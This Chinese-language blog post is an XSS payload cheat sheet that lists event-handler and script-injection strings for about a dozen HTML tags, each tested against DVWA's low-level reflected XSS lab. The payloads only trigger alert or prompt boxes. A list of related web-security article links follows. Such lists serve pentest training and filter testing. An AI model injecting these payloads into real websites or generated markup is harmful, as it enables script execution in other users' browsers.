所有标签已经测试完并可以使用,测试环境:DVWA的反射型XSS,等级low

0x01 <script>标签
<script>alert(2)</script>
<script>alert(2)</script//
0x02 <img>标签
<img src="x" onerror=alert(1)>;
<img src="1" onerror=eval("alert('xss')")>;
<img src=1 onmouseover=alert('xss')>
0x03 <a>标签
<a href="javascript:alert('xss')">aa</a>
<a href=javascript:eval(alert('xss'))>aa</a>
0x04 input标签
<input value="" onclick=alert('xss') type="text">
<input name="name" value="" onmouseover=prompt('xss') bad="">
0x05 svg标签
<svg onload=alert(1)>
0x06 details标签
<details ontoggle="alert('xss');">
<details open ontoggle="alert('xss');">
0x07 select标签
<select onfocus=alert(1)></select>
<select onfocus=alert(1) autofocus>
0x08 iframe标签
<iframe onload=alert("xss");></iframe>
0x09 video标签
<video><source onerror="alert(1)">
0x0A audio标签
<audio src=x onerror=alert("xss");>
0x0B body标签
<body/onload=alert("xss");>
0x0C textarea标签
<textarea onfocus=alert("xss"); autofocus>

-------------------------------------------------------------
目前只有这么多,以后继续加

web安全---XSS漏洞之标签使用2相关推荐

  1. Web安全 XSS漏洞的利用(Beef工具)(点击链接就被黑的技术.)

    XSS漏洞的 概括: XSS又叫CSS(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面,插入恶意JS代码,当用户浏览该页之时,嵌入其中JS代码就会被执行,从而达到攻击的目的 ...

  2. web安全----XSS漏洞之基本原理

    0x01 概述 XSS为跨站脚本攻击,XSS攻击针对的是用户层面的攻击!类型有反射型XSS.存储型XSS.DOM型XSS,这里的DOM可以理解为页面,或者是所有的标签.内容之和 0x02 反射型XSS ...

  3. Web安全之XSS漏洞

    同源策略 同源策略(Same-Origin Policy),就是为了保证互联网之中,各类资源的安全性而诞生的产物,它实际上是一个众多浏览器厂商共同遵守的约定.同源策略是浏览器中最基本的安全功能.缺少同 ...

  4. WEB安全:XSS漏洞与SQL注入漏洞介绍及解决方案

    对web安全方面的知识非常薄弱,这篇文章把Xss跨站攻击和sql注入的相关知识整理了下,希望大家多多提意见. 对于防止sql注入发生,我只用过简单拼接字符串的注入及参数化查询,可以说没什么好经验,为避 ...

  5. Web应用进行XSS漏洞测试

    对 WEB 应用进行 XSS 漏洞测试,不能仅仅局限于在 WEB 页面输入 XSS 攻击字段,然后提交.绕过 JavaScript 的检测,输入 XSS 脚本,通常被测试人员忽略.下图为 XSS 恶意 ...

  6. web漏洞-xss漏洞

    web漏洞-xss漏洞 文章目录 web漏洞-xss漏洞 前言 xss介绍 什么是xss xss漏洞产生原因 xss漏洞危害 xss漏洞分类 反射型xss 存储型xss DOM型xss xss漏洞防护 ...

  7. html%3ca%3e标签中有变量,经过代码审计找出网站中的XSS漏洞实战(三)

    1.背景 笔者此前录制了一套XSS的视频教程,在漏洞案例一节中讲解手工挖掘.工具挖掘.代码审计三部份内容,准备将内容用文章的形式再次写一此,前两篇已经写完,内容有一些关联性,其中手工XSS挖掘篇地址为 ...

  8. 开源web应用中存在三个XSS漏洞,可导致系统遭攻陷

     聚焦源代码安全,网罗国内外最新资讯! 编译:代码卫士 PT Swarm 公司的研究人员在热门的开源开发应用Evaluation CMS.FUDForum 和 GitBucket中发现了三个跨站脚本 ...

  9. 通过Web安全工具Burp suite找出网站中的XSS漏洞实战(二) 1

    一.背景 笔者6月份在慕课网录制视频教程XSS跨站漏洞 加强Web安全,里面需要讲到很多实战案例,在漏洞挖掘案例中分为了手工挖掘.工具挖掘.代码审计三部分内容,手工挖掘篇参考地址为快速找出网站中可能存 ...

最新文章

  1. 安装batocera-linux教程_利用Grub2Win安装Batocera+Windows7双系统甚至多系统实战教程
  2. qt中用mysql获取所有的数据库、数据库中的表名
  3. Android Service的思考(1)
  4. 014_Spring事务
  5. Android --- Binary XML file line2 Binary XML file line 2 Error inflating class unknown
  6. 【Java】使用Java调用Python的四种方法
  7. numpy之reshape()
  8. 2015年第六届蓝桥杯 - 省赛 - C/C++大学B组 - H.移动距离
  9. vscode 结束_21 个VSCode 快捷键,让代码更快,更有趣
  10. DllRegisterServer的调用失败的问题解决方法
  11. 矩池云如何使用 conda create 创建纯净的 Python3.6 环境?
  12. Bailian2743 字符串判等【字符串】
  13. problem c: 判断素数的函数_python100天 — Day 6 函数和模块的使用
  14. 18.事件基础,event对象,clientX,clientY,keyCode
  15. Unable to open log device '/dev/log/main' : No such file or directory it ...
  16. mysql建表指定表空间_Oracle中建表和指定表空间
  17. go标准库的学习-net
  18. linux系统网络代理设置
  19. 雷电android模拟器端口,【雷电命令】雷电安卓模拟器修改信息及常用adb命令整理贴...
  20. 小米手机计算机usb连接,小米手机连接电脑不显示usb选项

热门文章

  1. 怎么隐藏滚动条又能滚动
  2. FormatJS – 让你的 Web 应用程序国际化
  3. 2.12 Hivet中order by,sort by、distribute by和cluster by
  4. MySQL(介绍,安装,密码操作,权限表)
  5. Git迁移 从SVN到Git
  6. 第4章 maven依赖特性
  7. 示例 Demo 工程和 API 参考链接
  8. 解析css之position
  9. 张向东:就以当年期望别人对我们那样的方式
  10. cgcs2000大地坐标系地图_为什么要从北京54和西安80统一到CGCS2000?测绘人必知!...